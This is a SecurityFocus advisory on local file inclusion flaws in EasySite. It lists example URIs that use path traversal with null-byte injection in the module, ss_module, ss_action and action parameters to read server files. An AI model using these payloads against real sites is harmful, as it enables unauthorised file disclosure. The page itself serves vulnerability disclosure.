Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

EasySite Multiple Local File Include Vulnerabilities

Attackers can exploit these issues with a web browser.

The following example URIs are available:

http://www.example.com/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
http://www.example.com/modules/Module/index.php?module=../../../../autoexec.bat%00
http://www.example.com/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
http://www.example.com/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
http://www.example.com/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
http://www.example.com/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
http://www.example.com/modules/Themes/index.php?module=../../../../autoexec.bat%00
http://www.example.com/www/index.php?module=../../../
http://www.example.com/inc/vmenu.php?module=../../../







 

Privacy Statement
Copyright 2009, SecurityFocus